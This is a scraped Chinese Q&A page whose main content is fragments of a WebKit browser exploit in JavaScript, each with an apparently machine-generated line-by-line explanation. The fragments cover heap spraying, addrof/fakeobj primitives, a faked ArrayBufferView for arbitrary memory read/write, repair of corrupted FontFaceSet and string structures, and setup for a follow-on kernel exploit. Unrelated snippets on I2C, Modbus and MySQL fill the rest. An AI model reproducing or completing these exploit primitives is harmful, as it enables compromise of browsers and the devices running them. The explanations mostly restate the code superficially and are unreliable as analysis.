var slave = new Uint32Array(0x1000); slave[0] = 0x13371337; // First, leak the address of an array we'll use later for leaking arbitrary JSValues //debug("[*] Leaking address of array for leak primitive..."); var leakTgt = {a: 0, b: 0, c: 0, d: 0}; leakTgt.a = slave; primitiveSpray[leakAndFakePrimIdx][1] = leakTgt; var leakTargetAddr = oobDoubleArr[leakAndFakeDoubleIdx+2]; var leakTargetAddrInt64 = d2u(leakTargetAddr); // Second, leak the address of an array we'll use for faking an ArrayBufferView via inline properties //debug("[*] Leaking address of fake ArrayBufferView for R/W primitive..."); // Spray arrays for structure id for (var i = 0; i < 0x100; i++) { var a = new Uint32Array(1); a[Math.random().toString(36).replace(/[^a-z]+/g, '').substr(0, 5)] = 1337; structs.push(a); } var rwTgt = {a: 0, b: 0, c: 0, d: 0}; rwTgt.a = u2d(0x00000200, 0x1602300); rwTgt.b = 0; rwTgt.c = slave; rwTgt.d = 0x1337; primitiveSpray[leakAndFakePrimIdx][1] = rwTgt; var rwTargetAddr = oobDoubleArr[leakAndFakeDoubleIdx+2]; var rwTargetAddrInt64 = d2u(rwTargetAddr); //debug("| [+] R/W Target Address: 0x" + rwTargetAddrInt64.toString(16)); // Address + 0x10 = inline storage, so it will be the address of our fake ArrayBufferView rwTargetAddrInt64 = rwTargetAddrInt64.add32(0x10); // Write this fake object address into oobDoubleArr[leakAndFakeDoubleIdx+2] to retrieve the handle via primitiveSpray oobDoubleArr[leakAndFakeDoubleIdx+2] = u2d(rwTargetAddrInt64.low, rwTargetAddrInt64.hi); var master = primitiveSpray[leakAndFakePrimIdx][1]; var addrOfSlave = new int64(master[4], master[5]); //debug("[*] Setting up primitive functions...");请解释以上代码?

时间: 2024-02-14 17:31:06 浏览: 24
以上代码的目的是设置用于进行原始操作的函数和对象。 1. `var slave = new Uint32Array(0x1000);`:创建一个名为`slave`的`Uint32Array`数组,长度为0x1000(4096)。这个数组将被用作后续的操作。 2. `slave[0] = 0x13371337;`:将`slave`数组的第一个元素设置为0x13371337。 3. 创建泄漏目标对象和泄漏地址: - 创建了一个名为`leakTgt`的对象,其中包含四个属性`a`、`b`、`c`、`d`,初始值都为0。 - 将`slave`数组赋值给`leakTgt.a`,即将泄漏目标对象的属性`a`设置为`slave`数组。 - 将泄漏目标对象赋值给了`primitiveSpray[leakAndFakePrimIdx][1]`,即将找到的原始对象的属性设置为泄漏目标对象。 - 从`oobDoubleArr[leakAndFakeDoubleIdx+2]`处读取地址,并使用`d2u()`函数将其转换为64位浮点数表示的地址。 4. 创建用于伪造 ArrayBufferView 的目标对象和地址: - 循环创建`0x100`(256)个数组,并将每个数组的随机属性名设置为1337。这些数组将用于结构ID。 - 创建了一个名为`rwTgt`的对象,其中包含四个属性`a`、`b`、`c`、`d`,初始值都为0。 - 将一个特定的64位浮点数对象(0x00000200, 0x1602300)赋值给`rwTgt.a`。 - 将`slave`数组赋值给`rwTgt.c`,即将目标对象的属性`c`设置为`slave`数组。 - 将目标对象赋值给了`primitiveSpray[leakAndFakePrimIdx][1]`,即将找到的原始对象的属性设置为目标对象。 - 从`oobDoubleArr[leakAndFakeDoubleIdx+2]`处读取地址,并使用`d2u()`函数将其转换为64位浮点数表示的地址。 5. 将泄漏和伪造的地址进行处理: - 将泄漏地址加上0x10,得到的地址将作为伪造的 ArrayBufferView 的地址。 - 将伪造的 ArrayBufferView 的地址写入到`oobDoubleArr[leakAndFakeDoubleIdx+2]`处,以便通过原始对象访问此地址。 - 从原始对象中获取 `master`,并使用其第4和第5个元素创建一个 `int64` 类型的对象 `addrOfSlave`。 6. `//debug("[*] Setting up primitive functions...");`:调用了一个名为`debug`的函数,输出调试信息。此处输出了一条描述信息,表示正在设置原始操作所需的函数和对象。 根据注释和代码的逻辑,以上代码的目的是创建用于原始操作的对象和地址,并进行相应的设置,为后续的利用提供所需的基础。

相关推荐

rar

uart.rar_LIN slave_Master/Slave_UART STM32F429_half duplex_usart

The devices embed four universal synchronous/asynchronous receiver transmitters (USART1, USART2, USART3 and USART6) and four universal asynchronous receiver transmitters (UART4, UART5, UART7, and UART...
rar

I2C.rar_#I2C #STM32_Master/Slave_carriedhja

(Inter-Integrated Circuit), pronounced I-squared-C, is a synchronous, multi-master, multi-slave, packet switched, single-ended, serial computer bus invented in 1982 by Philips Semiconductor (now NXP ...
zip

FreeModbus_Slave-Master-RTT-STM32.zip_FreeModBus_Master/Slave_fr

freemodbus stm32 主从机代码

for (var i = 0; i < 13; i++) bad_fonts[guessed_font + i].family = "hammer" + i; function boot_addrof(obj) { arrays[257][32] = obj; union_f[0] = arrays[258][0]; return union_i[1] * 0x100000000 + union_i[0]; } function boot_fakeobj(addr) { union_i[0] = addr; union_i[1] = (addr - addr % 0x100000000) / 0x100000000; arrays[258][0] = union_f[0]; return arrays[257][32]; } //craft misaligned typedarray var arw_master = new Uint32Array(8); var arw_slave = new Uint8Array(1); var obj_master = new Uint32Array(8); var obj_slave = { obj: null }; var addrof_slave = boot_addrof(arw_slave); var addrof_obj_slave = boot_addrof(obj_slave); union_i[0] = structureid_low; union_i[1] = structureid_high; union_b[6] = 7; var obj = { jscell: union_f[0], butterfly: true, buffer: arw_master, size: 0x5678 };请继续解释一下以上代码?

首先,创建了一个名为arw_master的长度为8的Uint32Array数组,以及一个名为arw_slave的长度为1的Uint8Array数组。然后,创建了一个名为obj_master的长度为8的Uint32Array数组,以及一个名为obj_slave的对象...

regmap_block_write() 写入 command code=0x32, slave address = 0x2461 的数据 实例

好的,下面是一个使用 regmap_block_write() 函数写入 command code=0x32,slave address=0x2461 的数据的示例: c #include <linux/regmap.h> // 假设已经定义了一个名为 my_regmap 的 regmap 结构体指针 ...

(function () { var magic = boot_fakeobj(boot_addrof(obj) + 16); magic[4] = addrof_slave; magic[5] = (addrof_slave - addrof_slave % 0x100000000) / 0x100000000; obj.buffer = obj_master; magic[4] = addrof_obj_slave; magic[5] = (addrof_obj_slave - addrof_obj_slave % 0x100000000) / 0x100000000; magic = null; })(); //fix fucked objects to stabilize webkit (function () { //fix fontfaceset (memmoved 96 bytes to low, move back) var ffs_addr = read_ptr_at(addrof(post_ffs) + 8) - 208; write_mem(ffs_addr, read_mem(ffs_addr - 96, 208)); //fix strings (restore "valid") header for (var i = 0; i < needfix.length; i++) { var addr = read_ptr_at(addrof(needfix[i]) + 8); write_ptr_at(addr, (HASHMAP_BUCKET - 20) * 0x100000000 + 1); write_ptr_at(addr + 8, addr + 20); write_ptr_at(addr + 16, 0x80000014); } //fix array butterfly write_ptr_at(butterfly + 248, 0x1f0000001f); })(); //^ @sleirs' stuff. anything pre arb rw is magic, I'm happy I don't have to deal with that. //create compat stuff for kexploit.js var expl_master = new Uint32Array(8); var expl_slave = new Uint32Array(2); var addrof_expl_slave = addrof(expl_slave); var m = fakeobj(addrof(obj) + 16); obj.buffer = expl_slave; m[7] = 1; obj.buffer = expl_master; m[4] = addrof_expl_slave; m[5] = (addrof_expl_slave - addrof_expl_slave % 0x100000000) / 0x100000000; m[7] = 1;请解释以上代码及功能?

首先,创建了一个名为expl_master的长度为8的Uint32Array数组,以及一个名为expl_slave的长度为2的Uint32Array数组。然后,通过调用addrof函数获取到expl_slave的地址,并将其赋值给变量addrof_expl_slave...

#define SLAVE_ADDRESS_1 0x30

这段代码使用 #define 预处理指令定义了一个常量 SLAVE_ADDRESS_1,其值为 0x30,这意味着在程序中可以使用 SLAVE_ADDRESS_1 来代替 0x30,从而提高代码的可读性和可维护性。 在程序中使用常量的好处是,...

RL78/F12 IICA0 SLAVE模式参考代码

以下是RL78/F12 IICA0 SLAVE模式的参考代码: c #include "iodefine.h" // 定义I2C从设备地址 #define SLAVE_ADDRESS 0x50 // 定义接收和发送缓冲区 #define BUFFER_SIZE 16 volatile uint8_t receive_buffer...

int32_t rcar_iic_dvfs_send(uint8_t slave, uint8_t regr, uint8_t data),但寄存器地址是0x0607,怎么办

函数int32_t rcar_iic_dvfs_send(uint8_t slave, uint8_t regr, uint8_t data)是一个用于发送数据的函数,其中slave表示设备的从机地址,regr表示寄存器地址,data表示要发送的数据。 如果你需要发送数据到...

The slave I/O thread is not running

The error message "The slave I/O thread is not running" indicates that the slave database server is not able to connect or synchronize with the master database server in a MySQL replication setup....

qmi_wwan_q 2-1:1.4: bogus cdc union: master=0, slave=0 qmi_wwan_q: probe of

在这段描述中,出现了一个错误的提示信息:“bogus cdc union: master=0, slave=0”。这个提示表示在尝试进行qmi_wwan_q驱动程序的探测过程时,出现了一个错误。具体错误是指“cdc union”的主控制器和从控制器都被...

理解一下 uint8_t checksum = 0; uint8_t received; uint32_t datar = 0; uint8_t addrlsb = addr & 0xFF; //低八位 uint8_t addrmsb = (addr >> 8) & 0xFF; //高八位 SLAVE_CS_OUT &= ~FPGA_CS_PIN; //Start transmission. slave low; PIOUT &=11101111 即1.4输出低电平,其余输出高电平 SendUCB0Data(0x1); //Command byte (read) - Ignore dummy byte response checksum += 0x1; SendUCB0Data(addrlsb); //Address LSB checksum += addrlsb; SendUCB0Data(addrmsb); //Address MSB checksum += addrmsb; SendUCB0Data(0x00); //Dummy byte

其中,checksum变量初始化为0,received变量用于存放接收到的数据。datar变量表示32位数据,addrlsb变量表示地址的最低8位。这些变量可以根据实际情况进行赋值,然后根据校验算法计算出校验和,以确保数据的完整性和...

if (ioctl(i2cyzt, I2C_SLAVE, 0x48) < 0)

其中第一个参数为I2C总线的文件描述符,第二个参数为I2C_SLAVE,表示要设置的选项为从设备地址,第三个参数为从设备地址,这里设置为0x48。如果ioctl函数执行成功,则返回值为0,否则返回值为负数。在这段代码中,...

tx_frame.MsgID = ((uint32_t)SLAVE_ADDR<<6)|((uint32_t)CMD_STOP<<1)|(is_OK);//11bit

tx_frame.MsgID = ((uint32_t)SLAVE_ADDR ) | ((uint32_t)CMD_STOP ) | is_OK; 请注意,这里假设SLAVE_ADDR、CMD_STOP和is_OK都是合法的取值范围,并且它们的数据类型是兼容的。如果不是,请根据实际情况...

assign o_axis_slave0_tuser = dma_axis_slave0_tuser ;

这是一行Verilog HDL的代码,它的作用是将一个信号dma_axis_slave0_tuser赋值给另一个信号o_axis_slave0_tuser。其中assign关键字表示这是一个连续赋值语句,意味着当dma_axis_slave0_tuser发生变化时,o_axis_slave...

a slave with the same server_uuid/server_id as this slave has connected to t

当出现"A slave with the same server_uuid/server_id as this slave has connected to t"的错误时,意味着有两个或多个从服务器使用相同的server_uuid或server_id连接到了主服务器。 在MySQL复制中,每个从服务器...

include "Key.h" /* ---------------------------------------------------------------------------- * @breif:发送按键信息给从机 * @input:NONE * @retval:NONE */ void Send_Key_Inf(void) { uint16_t crc16=0; //校验码 if(sending_flag[USART1_Locat] == 0) { //没有报文正在发送 if(Dealwith.Key1_REG != 0 || Dealwith.Key2_REG != 0) { //有按键按下 Txbuf[0] = SLAVE_ADDRESS; //装置地址 Txbuf[1] = MOD_WRITE_M_REGISTER; Txbuf[2] = (uint8_t)(ADR_KEY_START>>8); Txbuf[3] = (uint8_t)(ADR_KEY_START); Txbuf[4] = 0x00; Txbuf[5] = 0x02; Txbuf[6] = 0x04; Txbuf[7] = (uint8_t)(Dealwith.Key1_REG>>8); Txbuf[8] = (uint8_t)(Dealwith.Key1_REG); Txbuf[9] = (uint8_t)(Dealwith.Key2_REG>>8); Txbuf[10] = (uint8_t)(Dealwith.Key2_REG); crc16 = CRC16(Txbuf,11); Txbuf[11] = (uint8_t)(crc16); Txbuf[12] = (uint8_t)(crc16>>8); Txlen = 13; //发送数据 DMA_Usart1_Send(Txbuf,Txlen); } } }将代码修改为被动发送数据

Txbuf[0] = SLAVE_ADDRESS; //装置地址 Txbuf[1] = MOD_WRITE_M_REGISTER; Txbuf[2] = (uint8_t)(ADR_KEY_START >> 8); Txbuf[3] = (uint8_t)(ADR_KEY_START); Txbuf[4] = 0x00; Txbuf[5] = 0x02; Txbuf...

解释这段代码: void Cmd_init(void) { uint16_t crc16=0; Cmd_read_para[0] = SLAVE_ADDRESS; Cmd_read_para[1] = MOD_READ_LOOP;//01//读线圈 Cmd_read_para[2] = 0x00; Cmd_read_para[3] = 0x02; Cmd_read_para[4] = 0x04; Cmd_read_para[5] = 0x08; crc16 = CRC16(Cmd_read_para,6); Cmd_read_para[6] = (uint8_t)(crc16); Cmd_read_para[7] = (uint8_t)(crc16>>8);

3. Cmd_read_para[0] = SLAVE_ADDRESS; 将SLAVE_ADDRESS的值赋给Cmd_read_para[0],指定了从设备的地址。 4. Cmd_read_para[1] = MOD_READ_LOOP; 将MOD_READ_LOOP的值赋给Cmd_read_para[1],指定了读取线圈的模式。...

RL78/F12 IICA0 SLAVE模式

RL78/F12是一款微控制器,而IICA0是其内置的I2C通信模块。在SLAVE模式下,RL78/F12可以作为I2C总线的从设备,接收来自I2C总线主设备的命令并执行相应的操作。在SLAVE模式下,RL78/F12需要设置自身的地址,并能够识别...

最新推荐

recommend-type

使用GPIO模拟实现IIC Slave的方法及source code_1.docx

实现一个由GPIO模拟的I2C从机工程设计,以前只使用GPIO模拟I2C设计过主机,对于从机的设计,比较少有。本次讲解从机设计思想并做详细记录。 程序模块化设计,核心代码分析讲解和说明,及通信流程图
recommend-type

嵌入式系统/ARM技术中的关于博控 SYS TEC CANopen 协议栈源代码

产品简介: SYS TEC CANopen 协议栈原代码包含了完整的功能源代码,用于实施CANopen master和slave设备。 详细介绍: CANopen 源代码选型指南 按源代码产品名称 按应用或设备类型 按 CANopen 设备和应用规范 源...
recommend-type

USB_SlaveFIFO开发记录

基于USB2.0芯片CY7C68013A与FPGA的SLAVE FIFO 模式开发过程记录,以及关键位置和注意事项
recommend-type

activemq master-slave搭建的NFSV4文档

activemq5.8版本搭建master/slave架构所需要的nfsv4的指导文档
recommend-type

node-v4.8.6-win-x64.zip

Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
recommend-type

zigbee-cluster-library-specification

最新的zigbee-cluster-library-specification说明文档。
recommend-type

管理建模和仿真的文件

管理Boualem Benatallah引用此版本:布阿利姆·贝纳塔拉。管理建模和仿真。约瑟夫-傅立叶大学-格勒诺布尔第一大学,1996年。法语。NNT:电话:00345357HAL ID:电话:00345357https://theses.hal.science/tel-003453572008年12月9日提交HAL是一个多学科的开放存取档案馆,用于存放和传播科学研究论文,无论它们是否被公开。论文可以来自法国或国外的教学和研究机构,也可以来自公共或私人研究中心。L’archive ouverte pluridisciplinaire
recommend-type

实现实时数据湖架构:Kafka与Hive集成

![实现实时数据湖架构:Kafka与Hive集成](https://img-blog.csdnimg.cn/img_convert/10eb2e6972b3b6086286fc64c0b3ee41.jpeg) # 1. 实时数据湖架构概述** 实时数据湖是一种现代数据管理架构,它允许企业以低延迟的方式收集、存储和处理大量数据。与传统数据仓库不同,实时数据湖不依赖于预先定义的模式,而是采用灵活的架构,可以处理各种数据类型和格式。这种架构为企业提供了以下优势: - **实时洞察:**实时数据湖允许企业访问最新的数据,从而做出更明智的决策。 - **数据民主化:**实时数据湖使各种利益相关者都可
recommend-type

如何用python编写api接口

在Python中编写API接口可以使用多种框架,其中比较流行的有Flask和Django。这里以Flask框架为例,简单介绍如何编写API接口。 1. 安装Flask框架 使用pip命令安装Flask框架: ``` pip install flask ``` 2. 编写API接口 创建一个Python文件,例如app.py,编写以下代码: ```python from flask import Flask, jsonify app = Flask(__name__) @app.route('/api/hello', methods=['GET']) def hello():
recommend-type

JSBSim Reference Manual

JSBSim参考手册,其中包含JSBSim简介,JSBSim配置文件xml的编写语法,编程手册以及一些应用实例等。其中有部分内容还没有写完,估计有生之年很难看到完整版了,但是内容还是很有参考价值的。